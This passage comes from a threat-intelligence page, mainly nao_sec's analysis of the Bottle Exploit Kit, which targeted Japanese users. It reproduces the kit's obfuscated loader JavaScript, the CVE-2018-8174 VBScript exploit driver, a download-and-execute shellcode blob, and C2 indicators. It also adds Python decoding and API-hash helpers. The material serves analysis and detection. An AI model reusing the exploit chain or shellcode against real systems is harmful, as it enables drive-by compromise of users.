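        parts.append(b"{\\object\\objemb{\\*\\objclass " + cls + b"}{\\*\\objdata " + lines + b"}}")
    parts.append(b"}")
    return b"".join(parts)


if __name__ == "__main__":
    print(classify_rtf(build_sample_rtf(b"8.t", True)))
```

    <p>Run it over a directory of suspected documents and triage the files where both flags are true. A file where only <code>equation_editor</code> is true may still be the v3 pattern discussed above, which the post classifies as Royal Road-related rather than Royal Road, so it deserves a look as well.</p>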
  60. Say hello to Bottle Exploit Kit targeting Japan

    Thu, 12 Dec 2019 15:00:00 -0000

    IOC

    BottleEK

    Traffic
    priv.inteleksys.com (139.180.136.22)
      /
      /file/style.css
      /file/ajax.min.js
      /file/main.js
      /file/1.gif
      /conn.php
      /file/vbs.vbs
      /file/swf.swf
    sales.inteleksys.com (139.99.115.204)

    Hash
    main.js  588bb25acf86ac18323d800372bbdc0eb89ba3ce80ed3d891a9c41b8db93df26
    1.gif    f89a8cc4dee2ac551380d0ecf5ee2d6dc2d2be20bb1929599a23edf79d8ed127
    vbs.vbs  0afe359d9659f9d43a737bf2e1fcbe4d7e216fee3085cad153a4548785bb0166
    swf.swf  340bfa57fafda31843588619cf505d08bdf41b6c3caf0df2b3b260473f3768d1

    Malware

    Traffic
    https://archive.torproject.org/tor-package-archive/torbrowser/8.0.8/tor-win32-0.3.5.8.zip
    5frjkvw2w3wv6dnv.onion
      /conn.php
      /rd.php
    4w6ylniamu6x7e3a.onion
      /connect.php

    Hash
    Malware
      914eb64b93cbb631c710ef6cbd0f9cedf93415be421ccc6e285b288b87f3a246
      c1b67a30119107365c4a311479794e07afb631980a649749501cb9f511fb0ab4
    DLL
      7d6823211590d0c9beffb964051ff0638e3e00beae3274733a6ccdf5c41fdede
      6625c178cc56184a1d8f8d0cbabff3abcc90820cd158b5860b10d6196d606a82
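    <p>The main.js walkthrough below describes how the kit recovers its strings: the string array is rotated once at load time, and each access decodes one entry with Base64, percent-decoding and RC4 under a key passed at the call site (for example <code>_0x2956('0x43', '^eQ7')</code>). The following is an added example for this page, not code from the nao_sec post or from the kit: it reimplements that scheme in Python so a dumped array can be decoded offline, including the inverse encoding so the behaviour can be checked against known plaintext. The table it decodes is constructed here; the four-character keys imitate the shape of the ones seen at the call sites in the post, but the strings are chosen for the demonstration and are not the kit's.</p>

```python
"""Added example: the string-table scheme the main.js walkthrough describes (rotate the
array, then Base64 -> percent-decode -> RC4 per string), reimplemented in Python so a
dumped array can be decoded offline. Not code from the nao_sec post or from the kit; the
table below is constructed from known plaintext for the demonstration."""
import base64
import urllib.parse


def rc4(text: str, key: str) -> str:
    """RC4 as main.js applies it: keystream bytes XORed into each character code."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + ord(key[i % len(key)])) % 256
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = []
    for ch in text:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(chr(ord(ch) ^ s[(s[i] + s[j]) % 256]))
    return "".join(out)


def decode_entry(enc: str, key: str) -> str:
    """Mirror of the kit's decode(): atob, '%xx' per byte, decodeURIComponent, then RC4."""
    raw = base64.b64decode(enc)
    pct = "".join("%%%02x" % b for b in raw)
    return rc4(urllib.parse.unquote(pct), key)


def encode_entry(plain: str, key: str) -> str:
    """Inverse of decode_entry (how the obfuscator produced the array). encodeURIComponent
    followed by turning each %XX back into a byte is just UTF-8 encoding of the RC4 output.
    Assumes plaintext code points below U+D800 so no lone surrogate arises from the XOR."""
    return base64.b64encode(rc4(plain, key).encode("utf-8")).decode("ascii")


def rotate_runtime(table: list, count: int) -> list:
    """The shift/push loop from main.js: move the first element to the end, count-1 times."""
    table = list(table)
    for _ in range(count - 1):
        table.append(table.pop(0))
    return table


def build_shipped_table(plaintexts: list, keys: list, count: int) -> list:
    """Encode each string with its own call-site key and pre-rotate the array the other way,
    so that rotate_runtime(..., count) restores the original order, as the shipped script does."""
    table = [encode_entry(p, k) for p, k in zip(plaintexts, keys)]
    for _ in range(count - 1):
        table.insert(0, table.pop())
    return table


def make_resolver(shipped: list, count: int):
    """Return the equivalent of the kit's _0x2956('0x43', '^eQ7') accessor: a function taking
    the hex index and the per-call key and returning the plaintext string."""
    table = rotate_runtime(shipped, count)

    def resolve(hex_index: str, key: str) -> str:
        return decode_entry(table[int(hex_index, 16)], key)

    return resolve


# Constructed demo table: the strings and keys are chosen for this example (the keys copy
# the four-character shape seen at the call sites in the post; they are not the kit's).
DEMO_STRINGS = ["username", "bingv", "compatible", "MSIE"]
DEMO_KEYS = ["^eQ7", "4@%$", "904!", "mNBB"]
DEMO_ROTATION = 0x3

if __name__ == "__main__":
    shipped = build_shipped_table(DEMO_STRINGS, DEMO_KEYS, DEMO_ROTATION)
    resolve = make_resolver(shipped, DEMO_ROTATION)
    for idx, key in enumerate(DEMO_KEYS):
        print(hex(idx), key, resolve(hex(idx), key))
```

    <p>To use it on a real dump, paste the shipped array and the count passed to the shift/push loop, then feed each <code>(index, key)</code> pair taken from the call sites to the resolver. RC4 is applied to each character code here, as <code>charCodeAt</code> does for BMP characters, so Japanese strings such as the loading message decode correctly; only the inverse encoder assumes plaintext below U+D800, because the XOR can otherwise produce a lone surrogate that <code>encodeURIComponent</code> would reject.</p>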
    <h2 id="first">First</h2> <p>On December 11, 2019, we were browsing ad networks. As before, we observed the RIG, Fallout and Underminer exploit kits, but we also observed another interesting drive-by download attack. We call it “Bottle Exploit Kit”. BottleEK targets only Japanese users. According to our research, BottleEK has been active since at least September 2019. In this post we introduce BottleEK.</p> <p><img src="https://nao-sec.org/assets/2019-12-13/0.gif" alt="" /></p> <p>Sample traffic data is <a href="https://www.virustotal.com/gui/file/5195da2b95ec7b13876ccca113cf6816146788fddbe99f16e3cb6af34f6c0822/detection">here</a>.</p> <h2 id="traffic">Traffic</h2> <p><img src="https://nao-sec.org/assets/2019-12-13/1.png" alt="" /></p> <p>We have confirmed that users are redirected to BottleEK by malvertising. When a user is redirected from the ad network to BottleEK, the landing page HTML is loaded first. The landing page loads two JavaScript files.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;!doctype html&gt;
&lt;html lang="ja"&gt;
&lt;head&gt;
&lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8"&gt;
&lt;meta http-equiv="x-ua-compatible" content="IE=10"&gt;
&lt;meta http-equiv="Expires" content="0"&gt;
&lt;meta http-equiv="Pragma" content="no-cache"&gt;
&lt;meta http-equiv="Cache-control" content="no-cache"&gt;
&lt;meta http-equiv="Cache" content="no-cache"&gt;
&lt;link href="file/style.css" rel="stylesheet" type="text/css"/&gt;
&lt;/head&gt;
&lt;body style="background-color: #F4F4F4;font-family:MS PGothic,Arial,Hiragino Kaku Gothic ProN,Osaka,sans-serif"&gt;
&lt;div id="main" class="main"&gt;&lt;/div&gt;
&lt;script type="text/javascript" src="file/ajax.min.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" src="file/main.js"&gt;&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre></div></div> <p>“ajax.min.js” is a JavaScript file for communication. It is used once, to get the exploit code URL. Since it is not important, we omit it this time. Just keep this function in mind.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>function e() {
    var b = document.createElement("script"),
        c = (new Date).getTime() + Math.round(1e3 * Math.random()),
        d = "JSONP_" + c;
    // JSONP: register the callback, then load the URL with callback=JSONP_&lt;timestamp&gt; appended
    a[d] = function (a) {
        clearTimeout(s), document.body.removeChild(b), q(a)
    }, b.src = h + (h.indexOf("?") &gt; -1 ? "&amp;" : "?") + "callback=" + d, b.type = "text/javascript", document.body.appendChild(b), f(d, b)
}
</code></pre></div></div> <p>Next, let’s read “main.js”. This file contains obfuscation, debug detection and environment detection, so reading everything is not easy. First, a large array is defined. Its entries look like Base64 strings, but Base64-decoding them does not yield anything meaningful. To decrypt them, you need to read two routines.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var _0x1d5a = ['bsK+BcOlwpXCmg==', 'OsKhwoIKb8OOwrHDsMOvEcOHw4Fn', 'ZMKfw6Fqw5R0', 'T1xqw70=', ...
</code></pre></div></div> <p>The first routine rotates the array. The code looks like this:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// rotate the string array: move the first element to the end, (_0x35d916 - 1) times
var _0x5906e4 = function (_0x35d916) {
    while (--_0x35d916) {
        _0x4480b8['push'](_0x4480b8['shift']());
    }
};
/* --- Snip --- */
var _0x29fbca = {
    'getCookie': function (_0xa8b74, _0x1731ce) {
        _0xa8b74 = _0xa8b74 || function (_0x1e7379) {
            return _0x1e7379;
        };
        var _0x36cf86 = _0xa8b74(new RegExp('(?:^|;\x20)' + _0x1731ce['replace'](/([.$?*|{}()[]\/+^])/g, '$1') + '=([^;]*)'));
        var _0x3ff1ff = function (_0xf3a699, _0x2d4894) {
            _0xf3a699(++_0x2d4894);
        };
        // the rotation is triggered from inside this cookie helper; _0x3c6c93 is the rotation count
        _0x3ff1ff(_0x5906e4, _0x3c6c93);
        return _0x36cf86 ? decodeURIComponent(_0x36cf86[0x1]) : undefined;
    }
}
_0x29fbca['getCookie'](null, 'counter');
</code></pre></div></div> <p>Next, the entries of the rotated array are decoded. This is the decryption code: a combination of Base64, URL decoding and RC4.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var decode = function (enc_data, key) {
    var a = [], b = 0, c, d = '', e = '';
    enc_data = atob(enc_data);
    // re-encode every byte as %xx so decodeURIComponent turns the bytes back into a string
    for (var i = 0, length = enc_data['length']; i &lt; length; i++) {
        e += '%' + ('00' + enc_data['charCodeAt'](i)['toString'](16))['slice'](-2);
    }
    enc_data = decodeURIComponent(e);
    for (var i = 0; i &lt; 256; i++) {
        a[i] = i;
    }
    /* RC4 */
    for (i = 0; i &lt; 256; i++) {
        b = (b + a[i] + key['charCodeAt'](i % key['length'])) % 256;
        c = a[i];
        a[i] = a[b];
        a[b] = c;
    }
    i = 0;
    b = 0;
    for (var j = 0; j &lt; enc_data['length']; j++) {
        i = (i + 1) % 256;
        b = (b + a[i]) % 256;
        c = a[i];
        a[i] = a[b];
        a[b] = c;
        d += String['fromCharCode'](enc_data['charCodeAt'](j) ^ a[(a[i] + a[b]) % 256]);
    }
    return d;
};
</code></pre></div></div> <p>This decrypts the array entries, and the main routine then runs.</p> <p>First, it checks whether a <code class="language-plaintext highlighter-rouge">username</code> cookie is set. If it is, processing ends. If not, it sets the cookie <code class="language-plaintext highlighter-rouge">username=bingv</code> and the attack continues.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var user = getCookie('username');
if (user == '') {
    setCookie('username', 'bingv', 0x1);
</code></pre></div></div> <p>Next, it checks the user environment. 
This is one of the most characteristic pieces of code in the Bottle Exploit Kit.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var chk = checkEnv();
</code></pre></div></div> <p><code class="language-plaintext highlighter-rouge">checkEnv</code> reads the browser language setting. If it is not Japanese, it displays a dummy HTML page and ends.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>function checkEnv() {
    var _0x4db42a = (navigator['language'] || navigator['browserLanguage'])['toLowerCase']();
    if (_0x4db42a['indexOf']('ja') == -0x1) return 0x0;
</code></pre></div></div> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// dummy page shown to visitors that fail the checks
document['getElementById']('main')['innerHTML'] = "&lt;h1&gt;Customer Login&lt;/h1&gt;&lt;form&gt;&lt;input type='text'value='User'&gt;&lt;input type='password'&gt;&lt;input type='submit'value='Submit'&gt;&lt;/form&gt;";
</code></pre></div></div> <p>Then browser information is obtained from the User-Agent. If it is not Internet Explorer, it displays the dummy HTML and ends in the same way.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var _0x100f15 = navigator['userAgent'];
var _0xed2c96 = _0x100f15['indexOf']('compatible') &gt; -0x1 &amp;&amp; _0x100f15['indexOf']('MSIE') &gt; -0x1;
var _0x4d34a9 = _0x100f15['indexOf']('Trident') &gt; -0x1 &amp;&amp; _0x100f15['indexOf']('rv:11.0') &gt; -0x1;
if (_0xed2c96) {
    // the two decoded strings never match, so the else branch is the obfuscator's anti-debugging code
    if (_0x2956('0x43', '^eQ7') !== _0x2956('0x44', '4@%$')) {
        var _0x41dde8 = new RegExp("MSIE (\d+\.\d+);");
        _0x41dde8['test'](_0x100f15);
        var _0x50d3cb = parseFloat(RegExp['$1']);   // IE major.minor version
        return _0x50d3cb;
    } else {
        _0x53ccba(this, function () {
            var _0x2e6966 = new RegExp("function *\( *\)");
            var _0xdc7ac8 = new RegExp("\+\+ *(?:_0x(?:[a-f0-9]){4,6}|(?:\b|\d)[a-z0-9]{1,4}(?:\b|\d))", 'i');
            var _0x4fc827 = _0x118083('init');
            if (!_0x2e6966['test'](_0x4fc827 + 'chain') || !_0xdc7ac8['test'](_0x4fc827 + 'input')) {
                _0x4fc827('0');
            } else {
                _0x118083();
            }
        })();
    }
</code></pre></div></div> <p>If these checks pass, an image is displayed. The <code class="language-plaintext highlighter-rouge">1.gif</code> used here is an image of a bottle. The <code class="language-plaintext highlighter-rouge">str1</code> shown below the image is Japanese (“Loading... please wait”).</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var str1 = '読み込み中。 。 。 お待ちください&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;';
/* --- Snip --- */
if (chk &gt; 0x0) {
    var myimg = document['createElement']('img');
    myimg['setAttribute']('id', 'ldimg');
    myimg['setAttribute']('style', 'position:absolute;width:40%;left:30%;height:40%; top:20%; z-index: 10;display:inline');
    myimg['setAttribute']('src', 'file/1.gif');
    document['body']['appendChild'](myimg);
    var myp = document['createElement']('p');
    myp['setAttribute']('id', 'ldpr');
    myp['setAttribute']('style', 'font-size:30px; position:absolute; left:5%; text-align:center; height:10%; top:60%; width:90%; z-index:10;');
    document['body']['appendChild'](myp);
    // fake progress bar: one update per second for LOAD_SECOND seconds
    for (var i = 0x0; i &lt;= LOAD_SECOND; i++) {
        var progress = Math['round'](i * 0x64 / LOAD_SECOND);
        (function (_0x368e63) {
            setTimeout(function () {
                change_progress(_0x368e63, str1);
            }, i * 0x3e8);
        }(progress));
    }
</code></pre></div></div> <p><img src="https://nao-sec.org/assets/2019-12-13/2.png" alt="" /></p> <p>Then it fetches the exploit code. Three parameters are sent at that time.</p> <ol> <li>Internet Explorer version</li> <li>whether the platform is 64-bit</li> <li>Adobe Flash Player version</li> </ol> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var is64 = 0x0;
if (navigator['platform']['indexOf']('64') != -0x1) is64 = 0x1;
var fls = flashChecker();
ajax({
    'type': 'GET',
    'dataType': 'jsonp',
    'timeOut': 0x2710,
    'url': '/conn.php?callback=?',
    'data': {
        'data1': chk,      // IE version
        'data2': is64,     // 64-bit platform flag
        'data3': fls['v']  // Flash Player version
    },
</code></pre></div></div> <p>This request is sent with the <code class="language-plaintext highlighter-rouge">ajax.min.js</code> we read earlier, so a <code class="language-plaintext highlighter-rouge">callback</code> parameter is appended to the URL.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>function e() {
    var b = document.createElement("script"),
        c = (new Date).getTime() + Math.round(1e3 * Math.random()),
        d = "JSONP_" + c;
    a[d] = function (a) {
        clearTimeout(s), document.body.removeChild(b), q(a)
    }, b.src = h + (h.indexOf("?") &gt; -1 ? "&amp;" : "?") + "callback=" + d, b.type = "text/javascript", document.body.appendChild(b), f(d, b)
}
</code></pre></div></div> <p>If the request succeeds, the exploit code is loaded using the response data. To exploit the Internet Explorer vulnerability it loads <code class="language-plaintext highlighter-rouge">file/vbs.vbs</code>; to exploit the Adobe Flash Player vulnerability it loads <code class="language-plaintext highlighter-rouge">file/swf.swf</code>.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>'success': function (_0x2ad29a) {
    // response[1]: Flash exploit URL, loaded in a 1x1 &lt;embed&gt;
    if (_0x2ad29a[0x1] != '') {
        if (_0x2956('0x69', '904!') !== _0x2956('0x6a', 'mNBB')) {
            var _0x5517a0 = document['createElement']('embed');
            _0x5517a0['src'] = _0x2ad29a[0x1];
            _0x5517a0['setAttribute']('style', 'width:1px; height:1px');
            document['body']['appendChild'](_0x5517a0);
        } else {
            // dead-code branch inserted by the obfuscator
            var _0x33b1ee = cname + '=';
            var _0x3a1f81 = document['cookie']['split'](';');
            for (var _0x2e7aac = 0x0; _0x2e7aac &lt; _0x3a1f81['length']; _0x2e7aac++) {
                var _0x446c09 = _0x3a1f81[_0x2e7aac];
                while (_0x446c09['charAt'](0x0) == ' ') _0x446c09 = _0x446c09['substring'](0x1);
                if (_0x446c09['indexOf'](_0x33b1ee) != -0x1) return _0x446c09['substring'](_0x33b1ee['length'], _0x446c09['length']);
            }
            return '';
        }
    // response[0]: VBScript exploit URL, loaded as a script element
    } else if (_0x2ad29a[0x0] != '') {
        var _0x5a39f4 = document['createElement']('script');
        _0x5a39f4['type'] = 'text/vbscript';
        _0x5a39f4['src'] = _0x2ad29a[0x0];
        document['body']['appendChild'](_0x5a39f4);
    }
}
</code></pre></div></div> <p><code class="language-plaintext highlighter-rouge">vbs.vbs</code> exploits CVE-2018-8174 and <code class="language-plaintext highlighter-rouge">swf.swf</code> exploits CVE-2018-15982.</p> <h3 id="cve-2018-8174">CVE-2018-8174</h3> <p><code class="language-plaintext highlighter-rouge">vbs.vbs</code> uses a simple string encoding. Decoding it gives almost the same code as the public PoC.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Sub StartExploit
    UAF
    InitObjects
    vb_adrr=LeakVBAddr()
    vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr))
    msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll")
    krb_base=GetBaseFromImport(msv_base,"kernelbase.dll")
    ntd_base=GetBaseFromImport(msv_base,"ntdll.dll")
    VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect")
    NtContinueAddr=GetProcAddr(ntd_base,"NtContinue")
    SetMemValue GetShellcode()
    ShellcodeAddr=GetMemValue()+8
    SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr)
    lIlll=GetMemValue()+69596
    SetMemValue ExpandWithVirtualProtect(lIlll)
    llIIll=GetMemValue()
    ExecuteShellcode
End Sub
StartExploit
</code></pre></div></div> <p>This is the shellcode that runs.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Function GetShellcode()
IIlI=Unescape("%u0000%u0000%u0000%u0000") 
&amp;Unescape("%u4cbf%u73d0%udb2c%ud9c5%u2474%u5bf4%uc92b%uc3b1%u7b31%u0313%u137b%uc383%u3248%uc586%ub3ff%u1669%u129b%u1659%u5563%ud61f%u581b%u9794%ue9d7%u03ea%ued6c%u2b61%uaef9%uef65%ueece%ue36d%u2f59%ufcf2%uaf99%u42fa%uac50%uf9c5%ub9e8%u3441%u5399%u928a%u40ea%uf18e%uabfc%ub143%u91b1%uc263%u73c0%ua49c%u7ceb%u2d28%u4338%uee19%u04b5%uc8a6%ub29d%u5eaa%u48ee%ua716%u7468%ua355%u8963%uc79e%u923b%u5373%u8ee3%ue825%uef63%uae42%uec9b%u2c9b%uf16c%u7bfc%ubb1b%uf5f2%ub84e%u407a%u7b84%u3dbf%uf727%u3e7a%u132c%ubd03%uf4e5%u3d85%ufaf6%u84a1%u7100%uf9db%u8555%u4068%u4ea9%ubf2a%u5223%u1b5f%ue940%u64ac%u57cd%u1051%udcdd%u5fad%u25de%u08fd%ufc1f%u5df2%uf0d3%ua6bd%u85a8%u568f%u9ea5%u948e%u177e%u62d5%u6d0b%ucc2e%ua750%ua40d%udbed%uafc3%u23f1%u2fe4%u0ea9%u3bf4%u5177%u067d%uda7b%u7538%u1e4a%u0e97%u22a0%u1df4%u736b%uf652%u8450%uf9a3%u8bed%uc0dd%u7e05%ucce0%u860d%u32e3%u0232%ua7c3%ueacc%ubcc2%ufc37%u3c02%u0238%u3d04%uf9b0%uc72c%u1cd4%u37d0%ua2db%ud8ea%uebae%u89da%ub539%ud51e%ub3e9%ud55a%u8284%u7550%u5c69%ufc9d%u99d0%ub810%u099a%u13d4%u551e%u151c%u5d5b%u539e%u756b%u6290%u7a94%uadac%uc3e3%u2d5b%ud385%u35b3%u1b97%u49bc%u6f51%u4a3e%u1962%u3bcd%ufeda%uef25%u011c%uef4a%u75d6%ue8c8%ufce9%u8023%u0d53%u56ac%uf2a5%ua8d3%u866f%ua351%uee70%uc2bd%u1fc8%u6056%ue02a%u7659%u94e4%u765d%ub77e%ucf28%u2f6a%u2e8f%u506d%uf82f%ue918%ufacc%ud66c%u9c04%ue96e%u622a%u9fb8%ubd93%ue93b%u563f%ue848%u59bf%ud1cd%uf900%u9f58%u5ba4%ue901%u8b66%u169f%ub397%ue836%u4c68%ubcc8%ua0e3%ud249%u39b4%u2b49%u6c66%uc31e%u6e75%uec5f%u7b39%u2d8a%u0946%u5680%u54cb%u6b20%u0608%udfe3%ue269%u88cb%u9901%u8fbb%uadaf%u3f01%u5e1f%u7ab2%uec8f%uf355%ud601%u2fe0%ub634%uaa9e%u0300%u5986%ue7ea%u6545%u2bb1%u1ad0%ub714%u98e5%u5888%u0d84%u602a%ub613%u00c3%u18f5%u98db%u15e1%u528b%u12ce%u7f0e%uf857%u4eac%u5f1f%u4f3f%u7c49%ue640%u4155%u0709%ub995%u0200%u79fd%u3f2c%u86fd%u64e7%u0c16%u6160%uede9%ue470%u2d6c%u098e%ufe91%ub0e2%uaf26%u6a03%uc2b0%u67b9%u5190%u48c4%u95ee%u1838%u2fc9%uea33%ucca3%ucad3%ueb0e%ua64b%u25e4%u0d53%u5ff8%ueb23%u5f00%uff85%ucde8%uffd4%u7c1
7%uc865%ub8e4%u4127%u82af%u0137%u583f%u2f9b%u9eba%ucfe5%u4e3b%u7597%u3f0b%u302c%u934f%uebcd%u915b%u78f2%uf169%u8b4a%u016d%uda54%uea49%ub067%u691c%uc9b7%u8de1%uc968%u6a4b%u6bd6%u4328%u5f2b%ueb9a%ufa15%u135a%u8446%u4bf2%u3644%uf808%u2d83%ua621%u871f%u46da%u4625%u4dd5%uae62%u62cf%u23b9%u8f5f%u0d88%u0f0c%uce77%u67c1%u4614%u0844%u868d%u84e2%ud721%u3dbd%ubed4%udb2f%u6f5c%u4fcb%u6ff1%ue246%u1d65%u6c07%ub958%u1cbb%u15a4%u9006%u95f4" &amp;lIIII(IIIII("")))
IIlI=IIlI &amp; String((&amp;h80000-LenB(IIlI))/2,Unescape("%u4141"))
GetShellcode=IIlI
End Function
</code></pre></div></div> <h3 id="cve-2018-15982">CVE-2018-15982</h3> <p><code class="language-plaintext highlighter-rouge">swf.swf</code> is almost the same as the PoC.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package {
import com.adobe.tvsdk.mediacore.metadata.Metadata;
import flash.display.Sprite;
import flash.events.Event;
import flash.net.LocalConnection;
import flash.system.Capabilities;
import flash.utils.ByteArray;
import flash.utils.Endian;

public class Main extends Sprite {
</code></pre></div></div> <p>The shellcode it executes is the same as in CVE-2018-8174.</p> <h2 id="shellcode">Shellcode</h2> <p>The shellcode downloads and executes malware, just like other EKs. The malware is not encrypted.</p> <p>The shellcode was encoded with the Shikata Ga Nai encoder.</p> <p><img src="https://nao-sec.org/assets/2019-12-13/3.png" alt="" /></p> <p>The decoded shellcode is simple code that downloads and executes malware. The APIs it uses are listed below:</p> <p><img src="https://nao-sec.org/assets/2019-12-13/4.png" alt="" /></p> <p>The API hashing algorithm is imul83hAdd.</p> <p><img src="https://nao-sec.org/assets/2019-12-13/5.png" alt="" /></p> <p>Interestingly, the download URL string is used as the name of the mutex it creates. 
<img src="https://nao-sec.org/assets/2019-12-13/6.png" alt="" /></p> <p>The malware is written to %temp% as svchost.exe and then executed with the WinExec function. <img src="https://nao-sec.org/assets/2019-12-13/7.png" alt="" /></p> <h2 id="malware">Malware</h2> <p>The malware is probably unique. We have never seen it elsewhere. According to my friend <a href="https://twitter.com/VK_Intel">@VK_Intel</a>, this could be a stealer targeting Japan.</p> <p>These are the characteristics of this malware:</p> <ul> <li>Checks for a Japanese environment using GetUserDefaultUILanguage</li> <li>Downloads and uses unzip.exe from these sites <ul> <li>ftp://ftp.cadwork.ch/DVD_V20/cadwork.dir/COM/unzip.exe</li> <li>ftp://freddy-ru.starlink.ru/ckJlag/antivir/SDFix/apps/unzip.exe</li> <li>ftp://ftp.cadwork.ch/DVD_V20/cadwork.dir/COM/unzip.exe</li> </ul> </li> <li>Downloads and uses Tor <ul> <li>https://archive.torproject.org/tor-package-archive/torbrowser/8.0.8/tor-win32-0.3.5.8.zip</li> </ul> </li> <li>C2 <ul> <li>[POST] 5frjkvw2w3wv6dnv.onion/conn.php</li> <li>[GET] 5frjkvw2w3wv6dnv.onion/rd.php</li> <li>[POST] 4w6ylniamu6x7e3a.onion/connect.php <ul> <li>User-Agent is <code class="language-plaintext highlighter-rouge">Mozilla/5.0 (Windows NT 6.1; WOW64)</code></li> </ul> </li> </ul> </li> <li>Main file locations <ul> <li>%temp%</li> <li><code class="language-plaintext highlighter-rouge">C:\Users\Public</code></li> </ul> </li> </ul> <h2 id="finally">Finally</h2> <p>Bottle Exploit Kit is an exploit kit targeting Japan. It is not as sophisticated as other exploit kits, but its JavaScript is elaborate. It has been observed for at least three months, and its activity continues today. The vulnerabilities it exploits are the same ones other EKs use, and the same caution applies. Keep an eye on its trend.</p> <p>Many people helped with our research. 
Special thanks to <a href="https://twitter.com/kafeine">@kafeine</a> and <a href="https://twitter.com/VK_Intel">@VK_Intel</a>.</p> <h2 id="ioc">IOC</h2> <ul> <li>BottleEK <ul> <li>Traffic <ul> <li>priv.inteleksys.com (139.180.136.22) <ul> <li>/</li> <li>/file/style.css</li> <li>/file/ajax.min.js</li> <li>/file/main.js</li> <li>/file/1.gif</li> <li>/conn.php</li> <li>/file/vbs.vbs</li> <li>/file/swf.swf</li> </ul> </li> <li>sales.inteleksys.com (139.99.115.204)</li> </ul> </li> <li>Hash <ul> <li>main.js <ul> <li>588bb25acf86ac18323d800372bbdc0eb89ba3ce80ed3d891a9c41b8db93df26</li> </ul> </li> <li>1.gif <ul> <li>f89a8cc4dee2ac551380d0ecf5ee2d6dc2d2be20bb1929599a23edf79d8ed127</li> </ul> </li> <li>vbs.vbs <ul> <li>0afe359d9659f9d43a737bf2e1fcbe4d7e216fee3085cad153a4548785bb0166</li> </ul> </li> <li>swf.swf <ul> <li>340bfa57fafda31843588619cf505d08bdf41b6c3caf0df2b3b260473f3768d1</li> </ul> </li> </ul> </li> </ul> </li> <li>Malware <ul> <li>Traffic <ul> <li>https://archive.torproject.org/tor-package-archive/torbrowser/8.0.8/tor-win32-0.3.5.8.zip</li> <li>5frjkvw2w3wv6dnv.onion <ul> <li>/conn.php</li> <li>/rd.php</li> </ul> </li> <li>4w6ylniamu6x7e3a.onion <ul> <li>/connect.php</li> </ul> </li> </ul> </li> <li>Hash <ul> <li>Malware <ul> <li>914eb64b93cbb631c710ef6cbd0f9cedf93415be421ccc6e285b288b87f3a246</li> <li>c1b67a30119107365c4a311479794e07afb631980a649749501cb9f511fb0ab4</li> </ul> </li> <li>DLL <ul> <li>7d6823211590d0c9beffb964051ff0638e3e00beae3274733a6ccdf5c41fdede</li> <li>6625c178cc56184a1d8f8d0cbabff3abcc90820cd158b5860b10d6196d606a82</li> </ul> </li> </ul> </li> </ul> </li> </ul>
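<p>The Shellcode section above says the decoded downloader resolves its Windows APIs by hash with the imul83hAdd algorithm. The following is an added example of how an analyst turns such hashes back into names; it is not code from the nao_sec post or from the Bottle EK samples. The hash routine is the multiply-by-0x83-then-add form that the FLARE shellcode hash database lists under that name, reconstructed here from memory and applied to the bare export name: treat both points as assumptions and confirm them against the sample's own hashing loop before trusting a match. WinExec and the mutex creation are named in the post; the other API names are constructed candidates.</p>

```python
"""Resolve API-name hashes found in decoded downloader shellcode.

Added example, not code from the nao_sec post. The hash is the
multiply-by-0x83-then-add routine that FLARE's shellcode hash database
names imul83hAdd, reconstructed from memory (assumption): verify it
against the sample's own hashing loop before trusting a match.
"""
from typing import Dict, Iterable, List, Optional

MASK32 = 0xFFFFFFFF

# Candidate export names. WinExec and mutex creation are named in the post;
# the rest are constructed candidates a downloader commonly imports. A real
# resolver would load the full export tables of kernel32/urlmon instead.
CANDIDATE_APIS: List[str] = [
    "LoadLibraryA", "GetProcAddress", "CreateMutexA", "GetTempPathA",
    "URLDownloadToFileA", "WinExec", "ExitProcess", "CreateFileA",
    "WriteFile", "CloseHandle", "VirtualAlloc", "GetLastError",
]


def imul83h_add(name: str) -> int:
    """h = (h * 0x83 + byte) mod 2**32 over the ASCII bytes of the export name."""
    h = 0
    for b in name.encode("ascii"):
        h = (h * 0x83 + b) & MASK32
    return h


def build_hash_db(names: Iterable[str]) -> Dict[int, str]:
    """Map hash -> name, refusing a table that would be silently ambiguous."""
    db: Dict[int, str] = {}
    for n in names:
        h = imul83h_add(n)
        if db.get(h, n) != n:
            raise ValueError(f"hash collision {h:#010x}: {db[h]} vs {n}")
        db[h] = n
    return db


def resolve(hashes: Iterable[int], db: Dict[int, str]) -> List[Optional[str]]:
    """Look each 32-bit hash up; None marks a hash the table does not cover."""
    return [db.get(h & MASK32) for h in hashes]


def annotate(hashes: Iterable[int], names: Iterable[str] = CANDIDATE_APIS) -> List[str]:
    """Produce 'hash -> name' lines for analysis notes; unknowns are flagged."""
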